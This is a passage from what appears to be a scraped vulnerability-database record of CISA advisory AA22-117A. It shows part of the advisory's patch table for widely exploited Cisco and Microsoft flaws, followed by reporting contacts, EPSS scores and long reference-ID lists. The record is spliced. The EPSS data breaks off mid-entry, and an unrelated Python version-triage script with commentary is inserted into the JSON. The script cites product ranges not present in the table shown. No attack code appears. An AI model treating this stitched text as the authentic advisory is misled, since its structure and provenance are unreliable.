Defense Information and Technology](<https://www.cisa.gov/uscert/ncas/alerts/aa22-047a>)\n\nJoint CSA [Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities](<https://www.cisa.gov/uscert/ncas/alerts/aa21-321a>)\n\nJoint CSA [APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://www.cisa.gov/uscert/ncas/alerts/aa20-283a>)\n\nACSC Alert [APT exploitation of Fortinet Vulnerabilities](<https://www.cyber.gov.au/acsc/view-all-content/alerts/apt-exploitation-fortinet-vulnerabilities>)\n\nCCCS Alert [Exploitation of Fortinet FortiOS vulnerabilities (CISA, FBI) - Update 1](<https://www.cyber.gc.ca/en/alerts/exploitation-fortinet-fortios-vulnerabilities-cisa-fbi>) \n \n[CVE-2018-0171](<https://nvd.nist.gov/vuln/detail/CVE-2018-0171>)\n\n| \n\nCisco \n\n| \n\nSee [Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>)\n\n| \n\n[Cisco Security Advisory: cisco-sa-20180328-smi2](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2#fixed>)\n\n| \n\nCCCS [Action Required to Secure the Cisco IOS and IOS XE Smart Install Feature](<https://www.cyber.gc.ca/en/alerts/action-required-secure-cisco-ios-and-ios-xe-smart-install-feature>) \n \n[CVE-2017-11882](<https://nvd.nist.gov/vuln/detail/CVE-2017-11882>)\n\n| \n\nMicrosoft \n\n| \n\nOffice, multiple versions; see [Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Office Memory Corruption Vulnerability, CVE-2017-11882](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882>)\n\n| \n\nCCCS Alert [Microsoft Office Security 
Update](<https://www.cyber.gc.ca/en/alerts/microsoft-office-security-update>) \n \n[CVE-2017-0199](<https://nvd.nist.gov/vuln/detail/CVE-2017-0199>)\n\n| \n\nMicrosoft \n\n| \n\nMultiple products; see [Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>)\n\n| \n\n[Microsoft Security Update Guide: Microsoft Office/WordPad Remote Code Execution Vulnerability w/Windows, CVE-2017-0199](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0199>)\n\n| \n\nCCCS [Microsoft Security Updates](<https://www.cyber.gc.ca/en/alerts/microsoft-security-updates>) \n \n### Contact Information\n\n**U.S. organizations: **all organizations should report incidents and anomalous activity to CISA 24/7 Operations Center at [report@cisa.gov ](<mailto:report@cisa.gov>)or (888) 282-0870 and/or to the FBI via your [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>) or the FBI\u2019s 24/7 CyWatch at (855) 292-3937 or CyWatch@fbi.gov. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact [Cybersecurity_Requests@nsa.gov](<mailto:Cybersecurity_Requests@nsa.gov>). **Australian organizations:** visit [cyber.gov.au](<https://www.cyber.gov.au/>) or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. **Canadian organizations:** report incidents by emailing CCCS at [contact@cyber.gc.ca](<mailto:contact@cyber.gc.ca>). **New Zealand organizations:** report cyber security incidents to [incidents@ncsc.govt.nz](<mailto:incidents@ncsc.govt.nz>) or call 04 498 7654. 
**United Kingdom organizations:** report a significant cyber security incident: [ncsc.gov.uk/report-an-incident](<https://www.ncsc.gov.uk/section/about-this-website/contact-us>) (monitored 24 hours) or, for urgent assistance, call 03000 200 973.\n\n### Revisions\n\nApril 27, 2022: Initial Version\n", "published": "2022-04-28T12:00:00", "modified": "2022-04-28T12:00:00", "epss": [{"cve": "CVE-2017-0199", "epss": 0.97445, "percentile": 0.99917, "modified": "2023-09-21"}, {"cve": "CVE-2017-11882", "epss": 0.97464, "percentile": 0.99933, "modified": "2023-09-20"}, {"cve": "CVE-2018-0171", "epss": 0.85039, "percentile": 0.98113, "modified": "2023-09-21"}, {"cve": "CVE-2018-13379", "epss": 0.97491, "percentile": 0.99954, "modified": "2023-06-23"}, {"cve": "CVE-2019-11510", "epss": 0.97334, "percentile": 0.99806, "modified": "2023-06-13"}, {"cve": "CVE-2019-18935", "epss": 0.90831, "percentile": 0.98349, "modified": "2023-06-13"}, {"cve": "CVE-2019-19781", "epss": 0.97475, "percentile": 0.99939, "modified": "2023-06-13"}, {"cve": "CVE-2020-0688", "epss": 0.97274, "percentile": 0.99754, "modified": "2023-06-05"}, {"cve": "CVE-2020-1472", "epss": 0.9732, "percentile": 0.9979, "modified": "2023-06-06"}, {"cve": "CVE-2020-2509", "epss": 0.00179, "percentile": 0.53708, "modified": "2023-06-06"}, {"cve": "CVE-2021-1675", "epss": 0.9612, "percentile": 0.99266, "modified": "2023-08-06"}, {"cve": "CVE-2021-20016", "epss": 0.02879, "percentile": 0.89244, "modified": "2023-05-27"}, {"cve": "CVE-2021-20038", "epss": 0.93313, "percentile": 0.98605, "modified": "2023-05-27"}, {"cve": "CVE-2021-21972", "epss": 0.97466, "percentile": 0.99929, "modified": "2023-05-27"}, {"cve": "CVE-2021-21985", "epss": 0.9748, "percentile": 0.9994, "modified": "2023-05-27"}, {"cve": "CVE-2021-22893", "epss": 0.96915, "percentile": 0.99542, "modified": "2023-05-27"}, {"cve": "CVE-2021-26084", "epss": 0.97488, "percentile": 0.99947, "modified": "2023-05-27"}, {"cve": "CVE-2021-26855", "epss": 0.97534, 
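The affected-version column above mixes three kinds of bound, and patch-triage scripts routinely get them wrong: "before X" excludes X, while "through X" and "X and prior" include X. The check below is an added example, not part of the advisory or any vendor's tooling. Its range entries are transcribed from the table (Confluence for CVE-2021-26084, ADSelfService Plus build 6113 and prior for CVE-2021-40539, Telerik UI for ASP.NET AJAX through 2019.3.1023 for CVE-2019-18935); the product keys, function names, hostnames and the inventory lines are made up for illustration.

```python
"""Triage an inventory against affected-version ranges from the table.

Added example; not part of the advisory. Range data is transcribed from
the Affected Products column; product keys, hostnames and the inventory
itself are made up for illustration.
"""
import re
from typing import List, Optional, Tuple

# (low bound inclusive or None, high bound, whether the high bound is inclusive)
Range = Tuple[Optional[str], str, bool]

AFFECTED = {
    # CVE-2021-26084: 6.13.23; 6.14.0 before 7.4.11; 7.5.0 before 7.11.6;
    # 7.12.0 before 7.12.5. "before" is an exclusive upper bound.
    "confluence": [
        ("6.13.23", "6.13.23", True),
        ("6.14.0", "7.4.11", False),
        ("7.5.0", "7.11.6", False),
        ("7.12.0", "7.12.5", False),
    ],
    # CVE-2021-40539: "version 6113 and prior" is an inclusive upper bound.
    "adselfservice-plus": [(None, "6113", True)],
    # CVE-2019-18935: "through 2019.3.1023" is an inclusive upper bound.
    "telerik-ui-aspnet-ajax": [(None, "2019.3.1023", True)],
}


def parse_version(text: str) -> Tuple[int, ...]:
    """Turn '7.4.11' or '2019.3.1023' into a tuple that compares numerically.

    Tuple comparison orders dotted versions correctly; plain string
    comparison would sort '7.10.0' before '7.4.0'.
    """
    return tuple(int(part) for part in re.findall(r"\d+", text))


def in_range(version: str, rng: Range) -> bool:
    """True if version lies within rng, honouring the bound's inclusivity."""
    low, high, high_inclusive = rng
    v = parse_version(version)
    if low is not None and v < parse_version(low):
        return False
    h = parse_version(high)
    return v <= h if high_inclusive else v < h


def is_affected(product: str, version: str) -> bool:
    """True if any transcribed range for the product contains the version.

    Products with no transcribed ranges are reported as not affected, so
    an unknown product key is a gap in the table, not a clean result.
    """
    return any(in_range(version, rng) for rng in AFFECTED.get(product, []))


# Constructed inventory (host,product,version); not from the advisory.
SAMPLE_INVENTORY = """\
wiki-01,confluence,7.4.10
wiki-02,confluence,7.4.11
wiki-03,confluence,6.13.22
idm-01,adselfservice-plus,6113
idm-02,adselfservice-plus,6114
web-01,telerik-ui-aspnet-ajax,2019.3.1023
web-02,telerik-ui-aspnet-ajax,2020.1.114
"""


def triage(inventory_csv: str) -> List[str]:
    """Return the hosts whose recorded version falls in an affected range."""
    hits = []
    for line in inventory_csv.splitlines():
        if not line.strip():
            continue
        host, product, version = (field.strip() for field in line.split(","))
        if is_affected(product, version):
            hits.append(host)
    return hits


if __name__ == "__main__":
    for host in triage(SAMPLE_INVENTORY):
        print(host)
```

Running it on the constructed inventory flags wiki-01, idm-01 and web-01: 7.4.10 is inside the exclusive Confluence range but 7.4.11 is not, 6113 is caught by the inclusive ADSelfService Plus bound while 6114 is not, and 2019.3.1023 itself is affected for Telerik. A version string cannot tell you whether a vendor hotfix or backported fix is installed, so treat a hit as a reason to consult the Patch Information column for that row, not as proof of exposure; for Exchange in particular, confirm both the cumulative update and the security update level rather than a bare version.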
Source: [2021 Top Routinely Exploited Vulnerabilities (AA22-117A)](<https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a>)
"immutableFields": [], "lastseen": "2023-09-23T06:47:11", "viewCount": 24, "enchantments": {"dependencies": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:09A31B56FFEA13FBA5985C1B2E66133B", "AKAMAIBLOG:30D20162B95C09229EEF2C09C5D98FCA", "AKAMAIBLOG:65F0FA2139A357151F74FA41EF42B50F", "AKAMAIBLOG:70514CEAD92A7A0C6AEE397520B2E557", "AKAMAIBLOG:7E872DA472DB19F259EC6E0D8CA018FF", "AKAMAIBLOG:B0985AEDEB4DAED26BDA30B9488D329D", "AKAMAIBLOG:B0DBF0121097FA293565FB7E66E09AB3", "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070", "AKAMAIBLOG:EC11EFBC73E974C28D27A64B77E1830E"]}, {"type": "almalinux", "idList": ["ALSA-2021:0218", "ALSA-2021:1647"]}, {"type": "alpinelinux", "idList": ["ALPINE:CVE-2020-1472", "ALPINE:CVE-2021-3156"]}, {"type": "altlinux", "idList": ["0666BB8481B59C8FF60D851348A7369C", "8907B92479FC3D90FF62A4920C4D6940", "FD4483A7DF9B7189B007C0C774CA4588"]}, {"type": "amazon", "idList": ["ALAS-2021-1469", "ALAS-2021-1478", "ALAS-2021-1553", "ALAS-2021-1554", "ALAS-2022-1580", "ALAS-2022-1601", "ALAS2-2021-1585", "ALAS2-2021-1590", "ALAS2-2021-1649", "ALAS2-2021-1730", "ALAS2-2021-1731", "ALAS2-2021-1732", "ALAS2-2022-1739", "ALAS2-2022-1773", "ALAS2-2022-1806"]}, {"type": "amd", "idList": ["AMD-SB-1034"]}, {"type": "apple", "idList": ["APPLE:251C897D47AD6A2DB0B7E3792A81C425", "APPLE:87ECB5906FD123665AEE056A2BC685F6", "APPLE:HT212177"]}, {"type": "archlinux", "idList": ["ASA-202009-17", "ASA-202101-25"]}, {"type": "arista", "idList": ["ARISTA:0070"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-67940", "CONFSERVER-67940", "CONFSERVER-68844", "CRUC-8529", "FE-7368"]}, {"type": "attackerkb", "idList": ["AKB:0B6C144F-2E5A-4D5E-B629-E45C2530CB94", "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:116FDAE6-8C6E-473E-8D39-247560D01C09", "AKB:12F253E0-F6F2-4628-A989-57A36E8C7026", "AKB:15082D97-CB46-4433-9BA3-6C37DC148340", "AKB:1AE51720-4534-42A8-879C-01FFE347E837", 
"AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2", "AKB:1FA9A53C-0452-4411-96C9-C0DD833F8D18", "AKB:21AD0A36-A0AA-486B-A379-B47156286E9E", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:3191CCF9-DA8E-43DF-8152-1E3A5D1A3C45", "AKB:35B88369-C440-49C0-98FF-C50E258FB32C", "AKB:398CAD69-31E4-4276-B510-D93B2C648A74", "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "AKB:587F1997-1604-43C4-9132-E5DABAECA5C1", "AKB:5BE82C1E-061F-4C04-93A2-1C15BBDE9337", "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:5E706DDA-98EC-49CA-AB21-4814DAF26444", "AKB:67AA97AC-E920-4D0C-9B50-6B1C42E683D1", "AKB:67DD67D3-33BC-455C-98A3-7DD0E1D4613D", "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "AKB:6EEE0386-669E-41EA-AABF-5685D2724967", "AKB:6F1D646E-2CDB-4382-A212-30728A7DB899", "AKB:71F77351-1AE5-4161-8836-D26680828466", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:7575B82F-7B7A-4416-B1AA-B8A2DF4D0800", "AKB:77E58EB9-547A-4137-BD9B-C2E5E487FA8E", "AKB:78B79B61-E949-48E9-BA41-A45CF0E9EA6C", "AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB", "AKB:7C700F0C-8A21-44FE-87D6-4E1601FE9D24", "AKB:812ED357-C31F-4733-AFDA-96FACDD8A486", "AKB:83332F26-A0EE-40BA-B796-8EE84ED704BC", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:90047E82-FDD8-47DB-9552-50D104A34230", "AKB:90DDDBF9-EA58-4470-B821-C35007A64BD6", "AKB:91756851-9B25-4801-B911-E3226A0656B5", "AKB:9ADF44D2-FA0D-4643-8B97-8B46983B6917", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:AA680CD3-76EC-4846-9C49-ADBE618F13BA", "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "AKB:B1318EAC-2E60-4695-B63B-2D10DAAA5B0E", "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:B50A8CA6-40B8-467B-A4B8-29A68F45B8A2", "AKB:B54A15A1-8D06-4902-83F9-DC10E40FA81A", "AKB:B8A2FA01-8796-4335-8BF4-45147E14AFC9", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:BDCF4DDE-714E-40C0-B4D9-2B4ECBAD31FF", "AKB:C0BD1D9D-A70C-4932-96C2-8DE83CA489E6", "AKB:C4CD066B-E590-48F0-96A7-FFFAFC3D23CC", 
"AKB:C91B7584-3733-4651-9EC0-BF456C971127", "AKB:CDA9C43E-015D-4B04-89D3-D6CABC5729B9", "AKB:D9826725-69EA-420F-9AB1-F16E3F0FDD68", "AKB:DEB21742-F92B-4F5A-931C-082502383C34", "AKB:E6BD4207-BAC0-40E1-A4C8-92B6D3D58D4B", "AKB:E7B3F106-3C35-4783-8A6A-BB887C64A40D", "AKB:ED05D93E-5B20-4B44-BAC8-C4CB5B46254A", "AKB:F0223615-0DEB-4BCC-8CF7-F9CED07F1876", "AKB:F05BE8C2-C144-45BE-BF46-5867A2CAAF15", "AKB:F2A441BA-2246-446C-9B34-400B2F3DD77B", "AKB:F48CAEEE-E809-405D-B7AD-48D94140C67D", "AKB:F7CCD0B7-220B-49E5-A4DF-27E26B64A3F0", "AKB:FB27076C-2538-4849-9291-199007E30708", "AKB:FF495201-9E29-4561-AE45-888E59E30E1B"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A", "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "AVLEONOV:30285D85FDB40C8D55F6A24D9D446ECF", "AVLEONOV:36BA0DE03DB6F8D0C96B6861C9A07473", "AVLEONOV:44DF3C4B3D05A7DC39FB6314F5D94892", "AVLEONOV:469525DB37AAC7A2242EE80C1BCBC8DB", "AVLEONOV:4E65E4AC928647D5E246B06B953BBC6F", "AVLEONOV:4FCA3B316DF1BAA7BC038015245D9813", "AVLEONOV:56C5888A0A7E36482CFC39A438BADAB3", "AVLEONOV:5945665DFA613F7707360C10CED8C916", "AVLEONOV:6A714F9BC2BBE696D3586B2629169491", "AVLEONOV:7E0DF6DEBB35FB55F6B4D33A7262A422", "AVLEONOV:8378A14587C08A1636BEE66608020687", "AVLEONOV:89C75127789AC2C132A3AA403F035902", "AVLEONOV:93A5CCFA19B815AE15942F533FFD65C4", "AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:9D3D76F4CC74C7ABB8000BC6AFB2A2CE", "AVLEONOV:B0F649A99B171AC3032AF71B1DCCFE34", "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7", "AVLEONOV:F17F36C3CC642EBDC27E43900FE3905E", "AVLEONOV:FEA9E4494A95F04BD598867C8CA5D246"]}, {"type": "canvas", "idList": ["NETSCALER_TRAVERSAL_RCE", "OFFICE_WSDL", "OWA_RCE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:19B4E04F8F1723A4F28FA7A8354698AF", "CARBONBLACK:91F55D2B8B2999589579EACB1542A3E9", "CARBONBLACK:A526657711947788A54505B0330C16A0", "CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712", 
"CARBONBLACK:E0EA1F343D1E082C73087FC784C141BD", "CARBONBLACK:F099654AA95F6498DB33414802DBA792", "CARBONBLACK:F60F48DF14A6916346C8A04C16AFB756"]}, {"type": "centos", "idList": ["CESA-2020:5439", "CESA-2021:0221"]}, {"type": "cert", "idList": ["VU:131152", "VU:213092", "VU:383432", "VU:421280", "VU:490028", "VU:619785", "VU:706695", "VU:794544", "VU:921560", "VU:927237", "VU:930724"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0251", "CPAI-2017-1009", "CPAI-2018-0193", "CPAI-2018-1187", "CPAI-2019-1097", "CPAI-2019-1653", "CPAI-2019-1914", "CPAI-2020-0104", "CPAI-2020-0872", "CPAI-2020-1095", "CPAI-2021-0099", "CPAI-2021-0100", "CPAI-2021-0106", "CPAI-2021-0107", "CPAI-2021-0376", "CPAI-2021-0461", "CPAI-2021-0465", "CPAI-2021-0476", "CPAI-2021-0548", "CPAI-2021-0554", "CPAI-2021-0877", "CPAI-2021-0879", "CPAI-2021-0894", "CPAI-2021-0900", "CPAI-2021-0936", "CPAI-2021-1065", "CPAI-2021-1113", "CPAI-2021-1174"]}, {"type": "checkpoint_security", "idList": ["CPS:SK171751", "CPS:SK176865"]}, {"type": "cisa", "idList": ["CISA:006B1DC6A817621E16EEB4560519A418", "CISA:01AC83B2C29761024423083A8BE9CE80", "CISA:134C272F26FB005321448C648224EB02", "CISA:16DE226AFC5A22020B20927D63742D98", "CISA:177CDBFAB8460E0C0E46679B383C5C2F", "CISA:18E5825084F7681AD375ACB5B1270280", "CISA:24BBE0D109CEB29CF9FC28CEA2AD0CFF", "CISA:28BCD901AF6661FE02928495E4D03129", "CISA:2B970469D89016F563E142BE209443D8", "CISA:2D62C340878780A9844A8FFDFA548783", "CISA:367C27124C09604830E0725F5F3123F7", "CISA:380E63A9EAAD85FA1950A6973017E11B", "CISA:3A09D1755051967FC65BD11A814E9167", "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "CISA:45B6D68A097309E99D8E7192B1E8A8BE", "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "CISA:61F2653EF56231DB3AEC3A9E938133FE", "CISA:661993843C9F9A838ADA8B8B8B9412D1", "CISA:6C836D217FB0329B2D68AD71789D1BB0", "CISA:6C962B804E593B231FDE50912F4D093A", "CISA:765265E5BF9328E9BAF09F93A1684580", "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "CISA:7FB0A467C0EB89B6198A58418B43D50C", 
"CISA:8367DA0C1A6F51FB2D817745BB204C48", "CISA:8809AF4B96861275A43448FB64E686D1", "CISA:8AA4B67E8B2150628DAEB8C3A98C4BEC", "CISA:8C51810D4AACDCCDBF9D526B4C21660C", "CISA:906D00DDCD25874F8A28FE348820F80A", "CISA:918B5EC3622C761B0424597D3F7AFF7C", "CISA:91DA945EA20AF1A221FDE02A2D9CE315", "CISA:920F1DA8584B18459D4963D91C8DDA33", "CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB", "CISA:B788AAE055F3DE2C255FCC0E7BE16B4B", "CISA:C70D91615E3DC8B589B493118D474566", "CISA:CB32DB4C2EA92462F387E1DA6C08F57E", "CISA:D7188D434879621A3A83E708590EAE42", "CISA:E46D6B22DC3B3F8B062C07BD8EA4CB7C", "CISA:E5A33B5356175BB63C2EFA605346F8C7", "CISA:F0D9A1ED5C31628B8E6D1E5F3AD609C4", "CISA:F3C70D08CAE58CBD29A5E5ED6B2AE473"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2017-0199", "CISA-KEV-CVE-2017-11882", "CISA-KEV-CVE-2018-0171", "CISA-KEV-CVE-2018-13379", "CISA-KEV-CVE-2019-11510", "CISA-KEV-CVE-2019-18935", "CISA-KEV-CVE-2019-19781", "CISA-KEV-CVE-2020-0688", "CISA-KEV-CVE-2020-1472", "CISA-KEV-CVE-2020-2509", "CISA-KEV-CVE-2021-1675", "CISA-KEV-CVE-2021-20016", "CISA-KEV-CVE-2021-20038", "CISA-KEV-CVE-2021-21972", "CISA-KEV-CVE-2021-21985", "CISA-KEV-CVE-2021-22893", "CISA-KEV-CVE-2021-26084", "CISA-KEV-CVE-2021-26855", "CISA-KEV-CVE-2021-26857", "CISA-KEV-CVE-2021-26858", "CISA-KEV-CVE-2021-27065", "CISA-KEV-CVE-2021-27101", "CISA-KEV-CVE-2021-27102", "CISA-KEV-CVE-2021-27103", "CISA-KEV-CVE-2021-27104", "CISA-KEV-CVE-2021-27852", "CISA-KEV-CVE-2021-31207", "CISA-KEV-CVE-2021-3156", "CISA-KEV-CVE-2021-34473", "CISA-KEV-CVE-2021-34523", "CISA-KEV-CVE-2021-34527", "CISA-KEV-CVE-2021-35464", "CISA-KEV-CVE-2021-40444", "CISA-KEV-CVE-2021-40539", "CISA-KEV-CVE-2021-42237", "CISA-KEV-CVE-2021-44228", "CISA-KEV-CVE-2021-45046", "CISA-KEV-CVE-2022-42475", "CISA-KEV-CVE-2022-47966"]}, {"type": "cisco", "idList": ["CISCO-SA-20180328-SMI2", "CISCO-SA-APACHE-LOG4J-QRUKNEBD", "CISCO-SA-SUDO-PRIVESC-JAN2021-QNYQFCM"]}, {"type": "citrix", "idList": ["CTX267027", "CTX335705"]}, {"type": "cloudfoundry", 
"idList": ["CFOUNDRY:690C01663F820378948F8CF2E2405F72", "CFOUNDRY:E2EC45D69AA3550DE981BAC4E63015D3"]}, {"type": "cloudlinux", "idList": ["CLSA-2021:1611743864"]}, {"type": "cnvd", "idList": ["CNVD-2021-101202", "CNVD-2021-69088", "CNVD-2022-87170"]}, {"type": "cve", "idList": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2017-11884", "CVE-2018-0171", "CVE-2018-13379", "CVE-2019-11510", "CVE-2019-18935", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-2509", "CVE-2021-1675", "CVE-2021-20016", "CVE-2021-20038", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22893", "CVE-2021-26084", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-27852", "CVE-2021-3100", "CVE-2021-31196", "CVE-2021-31206", "CVE-2021-31207", "CVE-2021-3156", "CVE-2021-33768", "CVE-2021-34470", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35464", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-4104", "CVE-2021-4125", "CVE-2021-42237", "CVE-2021-44228", "CVE-2021-44530", "CVE-2021-45046", "CVE-2022-0070", "CVE-2022-23848", "CVE-2022-33915", "CVE-2022-42475", "CVE-2022-47966"]}, {"type": "debian", "idList": ["DEBIAN:DLA-2463-1:1381E", "DEBIAN:DLA-2534-1:1EFB7", "DEBIAN:DLA-2534-1:AA5E2", "DEBIAN:DLA-2842-1:95CB4", "DEBIAN:DSA-4839-1:0839A", "DEBIAN:DSA-4839-1:3997C", "DEBIAN:DSA-5020-1:32A64", "DEBIAN:DSA-5022-1:D26EE"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2020-1472", "DEBIANCVE:CVE-2021-3156", "DEBIANCVE:CVE-2021-4104", "DEBIANCVE:CVE-2021-44228", "DEBIANCVE:CVE-2021-45046"]}, {"type": "dsquare", "idList": ["E-688", "E-691"]}, {"type": "exploitdb", "idList": ["EDB-ID:41894", "EDB-ID:41934", "EDB-ID:43163", "EDB-ID:44263", "EDB-ID:47287", "EDB-ID:47288", "EDB-ID:47297", "EDB-ID:47793", "EDB-ID:47901", "EDB-ID:47902", "EDB-ID:47913", "EDB-ID:47930", "EDB-ID:48153", "EDB-ID:48168", "EDB-ID:49071", 
"EDB-ID:49521", "EDB-ID:49522", "EDB-ID:49602", "EDB-ID:49879", "EDB-ID:49895", "EDB-ID:50056", "EDB-ID:50131", "EDB-ID:50243", "EDB-ID:50590", "EDB-ID:50592", "EDB-ID:51183"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:04BD77915CB7D5152AF289164D21448A", "EXPLOITPACK:1B366A9B404A79180DAB2A9C4AE015B0", "EXPLOITPACK:213FB88DED3CCAB77D32289A335E386D", "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "EXPLOITPACK:26C6702FE71DE1FE3096B330AA74AD07", "EXPLOITPACK:6EF33E509C6C5002F8E81022F84C01B5", "EXPLOITPACK:71F27F0B85E2B8F7A6B9272A3136DA05", "EXPLOITPACK:959CB519C011AA90D2BEE4ED33D8FEBF", "EXPLOITPACK:AE2D3F648B410F57DC5F105EDA166E2B", "EXPLOITPACK:D0A0C692882848C218FDF1B93258E171", "EXPLOITPACK:DFB2E04F89F872DFEF75605BCC9072DB", "EXPLOITPACK:E222442D181419B052AACE6DA4BC8485"]}, {"type": "f5", "idList": ["F5:K19026212", "F5:K24554520", "F5:K32171392", "F5:K34002344", "F5:K86488846", "F5:K93951507"]}, {"type": "fedora", "idList": ["FEDORA:0A343304CB93", "FEDORA:353D73154ABE", "FEDORA:38D8230C58CD", "FEDORA:4A64830CFCDC", "FEDORA:548FD3102AB0", "FEDORA:59AA230A7074", "FEDORA:60E3A30D1484", "FEDORA:95A5B306879A", "FEDORA:A5A703103140", "FEDORA:D8A0E3053060"]}, {"type": "fireeye", "idList": ["FIREEYE:173497473E4F8289490BBFFF8E828EC9", "FIREEYE:27339B4646A838356BA1378430516613", "FIREEYE:2FBC6EAA2BC98E48BDE41A39FB730AA1", "FIREEYE:327A8F88F73C7D036A5D128A75C86E11", "FIREEYE:35D0439B3D476357F4D2F51F3D5CD294", "FIREEYE:37C92D78C4F9986624FA2FB49CBCB764", "FIREEYE:4B85E44D28C8512270923B36728CBD59", "FIREEYE:61901D6D8B7FE74193954DA723EA43FC", "FIREEYE:78657FD52E5CBE87FE2D0019439691A0", "FIREEYE:81A95C8CF481913A870A3CEAAA7AF394", "FIREEYE:85C9D5EC8130810CFB601AF3559E0DB6", "FIREEYE:8926956380F9C38D0DE9955F5D9CBE06", "FIREEYE:8CFA7797EC0BA31DD1AD30C4C7EE1BED", "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "FIREEYE:92F27B3F6B5FC8C7C22B088678232819", "FIREEYE:9503F430A48297769A46076960747B2F", "FIREEYE:9CF80EFF287EE06F7EC0094727FE9C26", "FIREEYE:A19A2394490AB386D95215A17EEA2FC0", 
"FIREEYE:A728AA190E170AFDE8BF140059E0D0D5", "FIREEYE:AA5B50E5C593F4E6EFF300E3DE9EDB85", "FIREEYE:ABF21A18BEF0ABDDD461684446C0A772", "FIREEYE:BFB36D22F20651C632D25AA20588E904", "FIREEYE:C650A7016EEAD895903FB350719E53E3", "FIREEYE:D64714BFF80E34308579150D4C839557", "FIREEYE:D872F9CFF7406BD5A933C3819DBB6645", "FIREEYE:DE7D327A091FDB2A6C8A4AF7B6F71076", "FIREEYE:E126D2B5A643EE6CD5B128CAC8C217CF", "FIREEYE:E28F2F7E1B1F4BDA33635C841E315BCA", "FIREEYE:E77EEC61CF4FE2F4BDB43A5A0C15A644", "FIREEYE:ECB192E6133008E243C5B5CB25D9C6DD", "FIREEYE:F3E71742D8E5D617D6B77A2DB930882F", "FIREEYE:F58154E35F166E87B591935191A7EA69", "FIREEYE:FC60CAB5C936FF70E94A7C9307805695"]}, {"type": "fortinet", "idList": ["FG-IR-18-384", "FG-IR-20-233", "FG-IR-21-245", "FG-IR-22-398"]}, {"type": "freebsd", "idList": ["1EA05BB8-5D74-11EC-BB1E-001517A2E1A4", "24ACE516-FAD7-11EA-8D8C-005056A311D1", "2BAB995F-36D4-11EA-9DAD-002590ACAE31", "3FADD7E4-F8FB-45A0-A218-8FD6423C338F", "4B1AC5A3-5BD4-11EC-8602-589CFC007716", "515DF85A-5CD7-11EC-A16D-001517A2E1A4", "650734B2-7665-4170-9A0A-EECED5E10A5E", "93A1C9A7-5BEF-11EC-A47A-001517A2E1A4", "F3CF4B33-6013-11EB-9A0E-206A8A720317"]}, {"type": "gentoo", "idList": ["GLSA-202012-24", "GLSA-202101-33"]}, {"type": "github", "idList": ["GHSA-3QPM-H9CH-PX3C", 